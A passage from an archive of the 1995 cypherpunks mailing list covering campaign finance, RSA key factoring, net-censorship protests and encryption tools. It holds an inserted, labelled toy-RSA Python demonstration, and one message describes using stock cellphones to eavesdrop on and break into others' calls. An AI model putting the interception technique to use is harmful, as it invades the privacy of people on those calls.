parties. It would be a good thing if there were similar laws in the UK since at 
the last election a foreign national with links to organised crime allegedly 
made a multi million donation to the Conservative party. Of course in the 
absence of full disclosure of details of party records nobody can be sure. We 
are as voters entitled to consider the worst however.

Similarly it would be bad if a politician could obtain huge sums of money simply 
by espousing causes backed by large sums of cash. A candidate that proposed 
making large federal donations to the arms industry (codeword "Strong defence") 
might expect substantially more donations than one who proposed a reversal of 
this policy. Similarly candidates supporting private prisons might expect funds 
from the likely beneficiaries and so on.

The starting point for campaign reform has to be to cap the amount that can be 
spent on a campaign. Most countries have such laws to prevent the political 
process from being owned by the rich. Unfortunately this has happened in the US 
with the effect that both parties are much further to the right than in any 
other Western democracy. 


	Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 1995 04:15:02 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfaecb9000210043d3c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 AM 12/18/95, Jim Gillogly wrote:
>Correction of one detail:
>
>> tcmay@got.net (Timothy C. May) writes:
>> When you've done this, and concluded that RSA-129 could be done in, say, X
>> minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
>> group), and on to the 1024- and 2048-bit keys. Tell us how many years or
>> centuries it will take. (Hint: Rivest and Schneier have done these
>
>The BlackNet key break didn't have any MIT involvement: it was done by
>Paul Leyland of Oxford, Arjen Lenstra of Bellcore, Alec Muffet of Sun UK,
>and Jim Gillogly of Cypherpunks, RAND, and Gillogly Software in no
>particular order.
>

Sorry, Jim. I thought that Derek Atkins was involved, which led to thinking
it was MIT. Now that you've reminded me, some of the details are beginning
to come back. (I knew that someone from our list was involved....)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 19 Dec 1995 13:19:02 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Campaign Finance Reform
Message-ID: <m0tRlB4-0008zxC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 AM 12/18/95 -0500, you wrote:
>On Mon, 18 Dec 1995, Jon Lasser wrote:
>
>> On Sun, 17 Dec 1995, jim bell wrote:
>...
>> > It is absolutely true that you couldn't stop a person from communicating
>> > claims of a donation to a politician.   But what you COULD do is to ensure
>> > that the donor couldn't PROVE that he made such a donation.  In other words,
>> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
>> > senator would have no idea that I wasn't telling the truth.  The people who
>> > REALLY made such donations would be helpless.
>> 
>> A tricky way around this, if it's done ALMOST properly, is to donate in 
>> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to 
>> your campaign..."
>> 
>> All this means is that the donations would have to be lumped in some way 
>> so that Senator Sludgepump can't find out the exact amounts donated by 
>> any individual.
>
>Cancelled checks.
>
>Or, hand check in addressed, stamped envelope to Senator Sludgepump and 
>ask him if he would mind sealing it and dropping it in a mailbox.
>
All of which raises numerous opportunities for sting operations against
politicians, done by individuals by procedures provided for under law.
Escrow (Okay, I know that's a dirty word around here, but...) an encrypted
statement of how you intend to run the sting, to be opened by the escrow
agent at some point in the future, explaining who you're going after and
how.  Make the contribution, keep evidence, and if you're successful the
congressman goes to jail for a few years.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Mon, 18 Dec 1995 20:15:09 +0800
To: rick@muskoka.net
Subject: Re: BIO-MUNITION: gifs of perl-RSA tattoo
In-Reply-To: <Pine.BSD/.3.91.951217221057.9112A-100000@segwun.muskoka.net>
Message-ID: <14204.9512181148@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Richard Sheffar <rick@net.muskoka> writes on cpunks:
> Okay, I admit it I don't know everything.
> What does the perl script actually do.

It does RSA encrypt/decrypt, works with keys up to 1024 bits (and
larger).

> I saved to file, chmod 777 perly
> tried running the script and kept getting error line 3.

You need two utils installed on your machine: perl and dc.  Not having
dc would cause an error on line 3.  Try getting gnu dc (bc-1.03.tar.gz
from gnu sites, see:

	http://www.dcs.ex.ac.uk/~aba/rsa/dc.html
)

> What does it do, does it encrypt a file or what. What Have i done wrong?

To encrypt:

	rsa -k=11 -n=ca1 < plaintext > ciphertext
	
to decrypt:

	rsa -d -k=ac1 -n=ca1 < ciphertext > out

you can extract pgp keys to use with it, that was a 32 bit key for
demonstrational purposes and offers no security.  See:

	http://www.dcs.ex.ac.uk/~aba/rsa/pgpacket.html

for extracting pgp keys in hex format.

Adam
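
[Added example, not part of the message above and not the perl script it
discusses.  It runs raw RSA with the demonstration values quoted in the
message (k=11, n=ca1, k=ac1, all hex) and shows why such a key "offers no
security": the private exponent can be rebuilt from the public key alone.
The one-byte-per-block layout and all function names are assumptions made
for this sketch, not the script's own format.]

```python
"""Raw (unpadded) RSA with the demonstration key from the message above."""
from math import isqrt

# Hex values quoted in the message.
E = int("11", 16)    # public exponent, 17
D = int("ac1", 16)   # private exponent, 2753
N = int("ca1", 16)   # modulus, 3233 = 53 * 61


def rsa_apply(blocks, exponent, modulus):
    """Raise each integer block to `exponent` mod `modulus`."""
    out = []
    for m in blocks:
        # A block must be smaller than the modulus or it cannot be recovered.
        if not 0 <= m < modulus:
            raise ValueError(f"block {m} does not fit under modulus {modulus}")
        out.append(pow(m, exponent, modulus))
    return out


def encrypt(plaintext: bytes, e=E, n=N):
    # Assumed blocking: one byte per block, so every block is below n.
    return rsa_apply(list(plaintext), e, n)


def decrypt(blocks, d=D, n=N) -> bytes:
    return bytes(rsa_apply(blocks, d, n))


def factor(n):
    """Trial division. Instant for a modulus this small, hopeless for a
    real 1024-bit one, which is the whole difference between the two."""
    if n % 2 == 0:
        return 2, n // 2
    for p in range(3, isqrt(n) + 1, 2):
        if n % p == 0:
            return p, n // p
    raise ValueError("no factor found: n is prime")


def recover_private_exponent(e, n):
    """Rebuild d from the public values (e, n) by factoring n."""
    p, q = factor(n)
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)   # modular inverse (Python 3.8+)


if __name__ == "__main__":
    message = b"constructed sample text"   # constructed input
    ciphertext = encrypt(message)
    print("ciphertext blocks:", " ".join(f"{c:x}" for c in ciphertext))
    print("round trip ok:    ", decrypt(ciphertext) == message)
    print("factors of n:     ", factor(N))
    print("recovered d (hex):", f"{recover_private_exponent(E, N):x}")
    # Without padding, equal plaintext blocks give equal ciphertext blocks.
    print("repeats visible:  ", encrypt(b"aa")[0] == encrypt(b"aa")[1])
```
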





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Tue, 19 Dec 1995 06:56:47 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512181805.MAA11175@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>I'm not familiar with this aspect - how do cellular services store and
>make use of billing information, as opposed to traditional phone services?
>
Most cellular systems still write billing tapes and send them to a clearing
house for processing.  It may take 2 or 3 days before a bill is updated.
That's not including that it takes sometimes up to a month before your
roaming charges are recorded from all of the other cellular carriers.  Some
carriers have realtime billing but it still doesn't take into account roaming.

>>  If
>> cellular customers start getting sales calls from a company that received a
>> list from a cellular carrier, the cellular carrier is obligated to refund
>> the customer's bill for those calls if the customer complains because the
>> customer pays for calls coming or going.
>
>Is this obligation incurred by the contract between the customer and the
>cellular service, by statute, or otherwise? Contracts can always be
>broken, and passing laws to guard the guardians generally amounts to
>having the fox guard the henhouse...
>
This obligation is incurred mostly by the fact that cellular carriers HATE
to lose customers.  If refunding a few min. of air-time helps keep a
customer then they will.  Unlike the phone company, a threat to discontinue
service with a cellular carrier works well in getting your way.

                        Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Tue, 19 Dec 1995 02:54:13 +0800
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
Message-ID: <199512181805.MAA11178@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



>That just refers to the fact that it is no longer legal to sell
>scanners that can listen in to that range. 

I haven't seen any scanners that block the 900 MHz range.  Didn't think they
were blocking that.  There isn't any reason to. After all they don't block
the 49 MHz.

>(BTW, a couple of years ago Nuts & Volts ran
>an article with information on a program and some toys that let
>a laptop computer, properly wired into a cell phone, act as a
>cell scanner.  Never did wire it up, but it looked like fun ;)
>
Most cellular phones like the Motorola and the NEC can scan cellular
channels.  What's neat is that they require little or no modification.
They can scan through all cellular channels including control, pause on a
channel that has audio, and should signal level.  

I've used the Novatel and Motorola phones to even force the transmit on my
phone on a channel that was already in conversation and create a three way
call.  Since the cellular system already processed the original MIN and ESN
of the calling party my ESN is never checked.  All of this without modifying
my phone internally or adding a computer.  

This type of stuff makes encryption needed.  More and more people are using
PCMCIA cellular modems for all kinds of transactions not realizing that
anyone can pretty much intercept and use that information.  Digital will
help in some ways but harm on others.

$49 bucks will buy you an upconverter that will enable any scanner that can
pick up the 400 MHz range to pickup cellular.

                                Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 19 Dec 1995 06:14:48 +0800
To: jim@acm.org
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <199512180550.VAA13167@mycroft.rand.org>
Message-ID: <199512181815.NAA15202@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Correction of another detail:

> > tcmay@got.net (Timothy C. May) writes:
> > When you've done this, and concluded that RSA-129 could be done in, say, X
> > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
> > group), and on to the 1024- and 2048-bit keys. Tell us how many years or
> > centuries it will take. (Hint: Rivest and Schneier have done these

RSA-129 is 129 decimal digits, not 129 bits.  This computes to about
425 bits, which is actually more difficult than the 384-bit Blacknet
key.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Dec 1995 05:07:25 +0800
To: cypherpunks@toad.com
Subject: Fwd: Results of Internet Protest
Message-ID: <v02120d02acfb616a7bdd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Mon, 18 Dec 1995 11:16:31 -0500
Subject: Fwd: Results of Internet Protest
From: Joel Bowers <jmba@bluefin.net>
Mime-Version: 1.0
Apparently-To: <rah@shipwright.com>

Subject:     Results of Internet Protest
Sent:        12/18  2:06 AM
Received:    12/18  8:18 AM
From:        mcnmembers@macn.com
To:          MCNMembers@macn.com

From:   mcnmembers@macn.com (MCN Members)
Sender: jfried@desktopdesign.com (John Friedlander)
To:     MCNMembers@macn.com (MCN Members)
========================================================================
     CAMPAIGN TO STOP THE NET CENSORSHIP LEGISLATION IN CONGRESS

     THE NET ROCKS AMERICA'S CAPITOL - NEARLY 20,000 PARTICIPANTS
                    THURSDAY DECEMBER 14, 1995

            SENATE CONFEREES COULD STILL VOTE THIS WEEK
        RALLIES HAPPENING IN AUSTIN, NEW YORK, SF, & SEATTLE

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
                REDISTRIBUTE ONLY UNTIL December 25, 1995
________________________________________________________________________

RECAP: INTERNET DAY OF PROTEST:  TUESDAY DECEMBER 12, 1995

The net came into its own as a political force on Tuesday.  The
press release has more details.  If you haven't taken a moment to
call, fax, or email, do so now.  We're still keeping track and only
need a few more to break 20,000.

VTW had someone onhand in DC monitoring the response at the Congressional
offices.  The feedback was amazing; Congress got the message.  We need to
sustain that by continuing to tell them we're not happy with the options
being offered to us at this time.

Directions for calling Congress can still be found at http://www.vtw.org/
and the many other sites listed at the end of this message.  Take a moment
to call!  Don't forget to mail us a note at protest@vtw.org to let us
know you took part in the Day Of Protest (and Day 2, and Day 3, and Day
4).


FOR IMMEDIATE RELEASE                             December 13, 1995
                                            Contact:  Steven Cherry
                                                     (718) 596-2851
                                                        stc@vtw.org
                                                     Shabbir Safdar
                                                     (718) 596-2851
                                                    shabbir@vtw.org

New York, NY

Are 20,000 phone calls a lot? 30,000? 50,000? They are if you're one of a
handful of Congressional staffers trying to field them. Tuesday, December
12th was the Internet's Day of Protest. A variety of net-activists and
telecommunications-related services exhorted the on-line community to call
a selected group of Senators and Representatives to declare their
opposition to the threat of Internet censorship. And call they did.

As the Senate members of the Telecommunications Reform conference
committee contemplated portions of legislation that would censor
"indecent" material on-line, their staffers were being overwhelmed with
phone calls. Senator Inouye's office said they were "getting lots and lots
of calls and faxes." Senator Lott's said they were "flooded with calls."
At Senator Stevens' office there were so many calls they couldn't keep
a complete tally.

At Senator Exon's office, the fax machine was "backed up."  And at one
point, activists couldn't even get through to Senator Gorton's office to
ask. Exon is the Senator whose Communications Decency Act started the
nearly year-long struggle between those who would create special
regulations to restrict speech on-line (even, in certain instances,
private email between two individuals) to a greater extent than even
traditional broadcast media; regulations that, according to the ACLU and
many other civil liberties groups, will certainly be proven to be
unconstitutional if passed into law.

"We've never seen anything like it," said Stanton McCandish of the
Electronic Frontier Foundation (EFF). The EFF is one member of the on-line
coalition that has been fighting an array of censorship legislation since
this spring, when Senator Exon introduced his Communications Decency Act.

"We may have almost overwhelmed our provider," said Shabbir Safdar, head
of Voter's Telecommunications Watch (VTW). VTW is the organization that
organized the on-line coalition. Their on-line connectivity is provided by
Panix.com, a New York-area Internet service provider. "Panix has been
doing some maintenance work today, so it's hard to tell," Safdar
continued. "But we think it's actually made a dent in their connection
to the rest of the Net."

How many calls were actually made? No one can tell. For Leslie Miller, a
reporter for USA Today, it took much of the afternoon to get some counts
from Congressional staffers, and she couldn't get any report from the
Senate's Sergeant-At-Arms, the office nominally responsible for the
Senate's telephone system. VTW may be the only organization that can
really make an educated guess.

"In our Alerts we ask that people drop us an email note after they call,"
explained VTW board member Steven Cherry. "The message count peaked in the
late afternoon at over 70 per minute. Many of those were from people who
called several offices. By 7:30 P.M. (EST) we had gotten 14,000 messages.
By Wednesday morning the count was over 18,000. And of course there are
the people who called but didn't send us email. So all told, our very
rough guess is there were well over 50,000 phone calls and faxes made on
the one day."

"The Net is coming of age, politically," said Jerry Berman, Director of
the Center for Democracy and Technology (CDT), another member of the
on-line coalition. Safdar, of VTW, concurred, saying, "I think Washington
got the message today that there's a new grass-roots interest group
around, and we're going to be a big part of the 1996 elections." (VTW's
initial election activities can be found at http://www.vtw.org/pledge.)

In addition to the Day of Protest, rallies are scheduled on Thursday,
December 14th, in San Francisco and Seattle, and a protest will be held
that day at 2:00 in New York City.

The New York rally will be at the Cyber-Cafe, 273A Lafayette St from 2-3pm
on Thursday, Dec 14th.  Contact Steven Cherry or Shabbir J. Safdar for
details.

The Austin rally is planned for Tue. Dec 19th.  No more information is
available at this time.

Information about the San Francisco rally can be obtained from
http://www.hotwired.com/staff/digaman/.

Information about the Seattle rally can be obtained from
http://www.wnia.org/WNIA/hap/rally.html.

Voters Telecommunications Watch is a volunteer organization, concentrating
on legislation as it relates to telecommunications and civil liberties.
VTW publishes a weekly BillWatch that tracks relevant legislation as it
progresses through Congress. It publishes periodic Alerts to inform the
about immediate action it can take to protect its on-line civil liberties
and privacy.

More information about VTW can be found on-line at

  gopher -p 1/vtw gopher.panix.com
  www: http://www.vtw.org

or by writing to vtw@vtw.org. The press can call (718) 596-2851 or
contact:

   Shabbir Safdar         Steven Cherry
   shabbir@vtw.org        stc@vtw.org

________________________________________________________________________
WHERE CAN I LEARN MORE?

At this moment, there are several organizations with WWW sites that now
have, or will have, information about the net censorship legislation and
the National Day Of Protest:

American Civil Liberties Union (ftp://ftp.aclu.org/aclu/)
Center for Democracy and Technology (http://www.cdt.org/)
Electronic Frontier Foundation (http://www.eff.org/)
Electronic Privacy Information Center (http://www.epic.org/)
Wired Magazine (http://www.hotwired.com/special/indecent/)
Voters Telecommunications Watch (http://www.vtw.org/ or finger
vtw@panix.com)

________________________________________________________________________
        End Alert
========================================================================



----------------------- Headers --------------------------------

_________________________  Joel M Bowers & Assoc [jmba@jmba.com]
Multiuser Database Design [MCN,ASPN & Claris Solutions Alliance]
_________________________    Voice 603-778-7494 Fax 603-778-7484
_________________________15 Curtis Road, Hampton Falls, NH 03844


--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 19 Dec 1995 05:43:58 +0800
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: my idea of the ideal encryption tool for the masses
In-Reply-To: <199512170710.SAA17896@molly.cs.monash.edu.au>
Message-ID: <199512182100.OAA06654@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Jiri Baum <jirib@cs.monash.edu.au> wrote in private e-mail:
>
> Apart from that, this kind of thing has been proposed before,
> and (for payment at least) I've read a paper somewhere that
> uses something like this to get off-line anon. e-cash with
> multi-party mistrust. (Ie nobody trusts anybody.)


Yes, even such klooges such as Mondex might be considered a 
variation on my idea.  Ultimately, though, I expect this device 
to become my *only* interface with the Net.  I don't own any 
long-term storage device.  Instead I just rent it over the Net 
and encrypt any long-term data that I consider private.  I do 
any *sensitive* processing on the CPU in my handheld computer, 
but if it's a big job and I don't mind people watching then 
I rent a CPU over the Net to chew on it.


This device is perfectly portable and can be plugged into any 
Net jack in an office or telephone booth, or perhaps it can do 
wireless.  The important point is that no matter where I am 
physically, or what long-term storage device I am using via the 
Net, I have complete crypto security.  (Mod Tempest-
surveillance, physical subversion of my crypto box, etc.)  If it 
were done right I could use this same box for my notepad, wallet, 
e-mail agent, Web browser, game-player, etc. etc. etc.


> (But that requires the bank to trust tamper-proof h/w; if you
> give up anon, as you have, you don't need that because it only
> need resist until Joe can revoke his key - easily enough done
> because the shop needs to have a list of valid ones anyway.
> Alternatively you can keep anon but make clearing on-line, 
> which results in what is usually called a digital wallet.)


Hm.  As often happens in these kinds of discussions, we've 
missed each other because of different semantic conventions or 
something.  My idea does not depend upon tamper-proof hardware 
in the sense that the owner must be prevented from cracking it 
open, but it *does* (as does every conceivable crypto system) 
depend on tamper-prevention in the sense that those antagonistic 
to the owner must be prevented from cracking open his box!


Also I haven't given up anonymity at all.  Oh!  You mean in my
example of Joe paying at the grocery store.  Well he can have a
pseudonymous account at that store if he wants.  There is 
certainly no *necessity* to give up self-identity-control in any 
way.


> > It only does this in response to some kind of
> > authentication-action from Joe himself.  Perhaps he
> > inputs a 4-digit PIN.  (It should be designed so that
> ...
> 
> Fingerprint scan?


I thought about that but I personally wouldn't trust it.  It 
might fail to recognize my fingerprint at an important moment.  
Besides, I hate the thought of a mugger taking my index finger 
also when he takes my wallet...


Regards,

Bryce

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mitton Ken <mittonk@ucsu.colorado.edu>
Date: Tue, 19 Dec 1995 06:23:36 +0800
To: cypherpunks@toad.com
Subject: Re: redirect of newsgroups
Message-ID: <199512182116.OAA21364@ucsu.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Might be able to if you had admin-level access to the newsserver, but if 
there's a firewall between you and the nearest uncensored newsserver,
I doubt that's the case... had the same problem on my school machine.
Ended up just getting an account on another machine.

	--Ken Mitton
	mittonk@colorado.edu
	http://ucsu.colorado.edu/~mittonk/
	PGP KeyID: BAB3CF0D

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNXZ7Wzuqz+6s88NAQHrwQIA0bHF+6yxLHPcFIdODJhTH7Mq4+vKxho+
Jq4xOBn+yB8KY0mhPFUKQx43xmULt44AB2Jeo1cEt9FTRAFSIvua3A==
=mTvu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 07:21:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Campaign Finance Reform
In-Reply-To: <m0tRlB4-0008zxC@pacifier.com>
Message-ID: <Pine.BSF.3.91.951218145215.16623C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Dec 1995, jim bell wrote:

> At 10:41 AM 12/18/95 -0500, you wrote:
> >On Mon, 18 Dec 1995, Jon Lasser wrote:
> >
> >> On Sun, 17 Dec 1995, jim bell wrote:
> >...
> >> > It is absolutely true that you couldn't stop a person from communicating
> >> > claims of a donation to a politician.   But what you COULD do is to ensure
> >> > that the donor couldn't PROVE that he made such a donation.  In other words,
> >> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
> >> > senator would have no idea that I wasn't telling the truth.  The people who
> >> > REALLY made such donations would be helpless.
> >> 
> >> A tricky way around this, if it's done ALMOST properly, is to donate in 
> >> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to 
> >> your campaign..."
> >> 
> >> All this means is that the donations would have to be lumped in some way 
> >> so that Senator Sludgepump can't find out the exact amounts donated by 
> >> any individual.
> >
> >Cancelled checks.
> >
> >Or, hand check in addressed, stamped envelope to Senator Sludgepump and 
> >ask him if he would mind sealing it and dropping it in a mailbox.
> >
> All of which raises numerous opportunities for sting operations against
> politicians, done by individuals by procedures provided for under law.
> Escrow (Okay, I know that's a dirty word around here, but...) an encrypted
> statement of how you intend to run the sting, to be opened by the escrow
> agent at some point in the future, explaining who you're going after and
> how.  Make the contribution, keep evidence, and if you're successful the
> congressman goes to jail for a few years.  


The problem with the private investigation is that law enforcement may 
not believe you were an "innocent" citizen conducting an investigation.  
Remember the ABSCAM Congressman who contended he was conducting his own 
investigation ...

Escrowing what you intend to do could be seen as blackmail ammunition if 
the Congressman fails to produce.

Unfortunately for the Cryptoanarchists (tm -- in more ways than one), 
absent law enforcement running the "sting" you are taking a risk of being 
stung yourself.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 19 Dec 1995 05:43:09 +0800
To: cypherpunks@toad.com
Subject: Re: Securing the end-points
In-Reply-To: <608235518.31497752@BayNetworks.com>
Message-ID: <Pine.LNX.3.91.951218153917.98A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 18 Dec 1995, Glen McBride wrote:
 
> Greetings!
> I was wondering if in addition to all the work and discussion regarding
> crypto which generally centres around the transmission path information takes
> traveling from end-point to end-point, there is any work being done to secure
> the end-points themselves (I.e. files on your PC etc.)
> 
> In my view the end-points present the most vulnerability in the overall
> message path from person to person. It is at these points that the
> message/information exists as cleartext even if for a short period of time.
> While of course it is possible to PGP encode your files is this a practical
> way to go about securing your system? I am aware of RSA secure but is that
> all there is out there?
> 
> Thanks in advance
> 
> Glen McBride
> Bay Networks ASIA-PAC customer service
> Australia
> 

The best way to secure the endpoints of communication is to use a sector level
encryption TSR like SecureDrive.  In a program like this, when a file is
opened for reading or writing, the TSR automatically en/decrypts the data
before it is processed by the calling application.  Aside from a slightly
slower disk access rate, a program like this is not inconvenient to use at all.
SecureDrive is available at
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/secdr13c.zip.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----


finger markm@voicenet.com for Public Key http://www.voicenet.com/~markm/
Key-ID: 0xF9B22BA5 Fingerprint: bd24d08e3cbb53472054fa56002258d5
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d- s:- a? C++++ U+++>$ P+++ L++(+++) E--- W++(--) N+++ o- K
w--- O- M- V-- PS+++>$ PE-(++) Y++ PGP+(++) t-@ 5? X++ R-- tv+
b+++ DI+ D++ G+++ e! h* r! y?
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 19 Dec 1995 13:20:21 +0800
To: vznuri@netcom.com
Subject: Re: Political Cleanup program
Message-ID: <01HYYIT21PW88Y51HJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: "Vladimir Z. Nuri" <vznuri@netcom.com>

>there seem to be a lot of people who suggest that merely because politics
involves money, it is therefore corrupt. this is an awfully vague and
nebulous line of thinking in my view. are we to suppose that any industry
that involves money (all of them, of course) inevitably moves in 
the direction of corruption? perhaps some more "cynicalpunks" may have 
this view, but I don't share it.
---------------------------------
	I am admittedly uncertain whether to reply to this, but... one thing
about capitalism is that money serves as a reward. Attempts to remove this
(such as in the Soviet Union) have resulted in people no longer being motivated
by things like bonuses. In other words, if we can remove the government from
having influence on the markets, then politics by money is not really a
problem. It's just another motivation for people to get more money.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 19 Dec 1995 06:44:51 +0800
To: tcmay@got.net
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <01HYYJ27WNYQ8Y51HJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)

>First, half a million chips is not that big a deal...the Connection Machine
had up to 64,000. Very few cryptographic problems of interest to us will be
affected by a mere factor of a million or so.
--------------------
	While the cryptographic stuff isn't much of a problem, how about text
analysis of multiple sources, possibly via a neural net simulation (which IIRC
a massively parallel machine is nice for)?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Tue, 19 Dec 1995 06:51:41 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
In-Reply-To: <199512151800.KAA11304@jobe.shell.portal.com>
Message-ID: <4b4nnc$b57@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199512151800.KAA11304@jobe.shell.portal.com>,
 <anonymous-remailer@shell.portal.com> wrote:
>On Mon, 11 Dec 1995, Michael Coates wrote:
>
>> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
>> Netscape Communications has awarded two software sleuths $1,000 each for
>> finding security gaps in its Netscape Navigator 2.0 software.  The company
>> also awarded gifts to 50 other contestants in its "Bugs Bounty" program for
>> identifying non-security problems.  (Wall Street Journal 11 Dec 95 B7)
>
>Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
>from Netscape for finding the HUGE security flaws in Netscape's existing 
>product line??
>
>I can't remember whether they got anything or not ...

That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).

   - Ian "There's a reason people talk about `starving grad students'..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 19 Dec 1995 07:37:15 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512182241.RAA01276@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:15 PM 12/17/95 -0500, Thaddeus J. Beier wrote:
> ----------
> ... about the fate and capabilities of the CCC PIM
> (processor-in-memory) machine.  A friend of mine was
> working on it, and it would have been a screaming machine,
> no doubt about it.  He said that the Cray mostly acted like
> a really fast network for the processor chips.

I had thought that it may have been similar to an Active Memory
design, but had no real clues to go by. Wasn't sure about the
chip array path width either, but thought that 1 bit was probably
the way to go given the array size.

> ... the PIM chips were made by a dedicated NSA company,
> Supercomputer Research Center, in Bowie MD.

Hmm... is that the name?

> But, it was nowhere near finished when the company finally went
> down, and the team was completely disbanded.  My friend was talking
> about going to the auction when the parts of the various machines
> were going to be sold, I don't know if he did so.  He suspected that
> the various pieces would end up going back east to the Fort
> Meade area.  Still, it is such an odd machine that you would
> probably have to transfer the staff to finish it, and that didn't
> happen.

Sorry Thad... but NOTHING 'just disappears' at the NSA...

> In any case, while it was fast (1/2 million 1-bit processors,
> perhaps as low as 1 nanosecond (1 GHz) cycle time), it was not fast
> enough to brute force reasonably strong ciphers.  It's really no joke
> that it would take a computer with picosecond clocks the size of the
> earth more than the age of the universe to brute force IDEA, for
> instance.

Hahahahahahahah!!!!!!!!!! A cryptographer's most POWERFUL weapon, is
A False Sense of Security... If you've read Kocher's abstract, you
would NO DOUBT realize that there are ALWAYS options to be explored
and exploited. I'm sorry, don't take it personal, but I think that this
'til the end o' time' argument leaks like a "sieve"... it's the classic
linear thinking thing.

> It would have made a great DES cracker, though; my
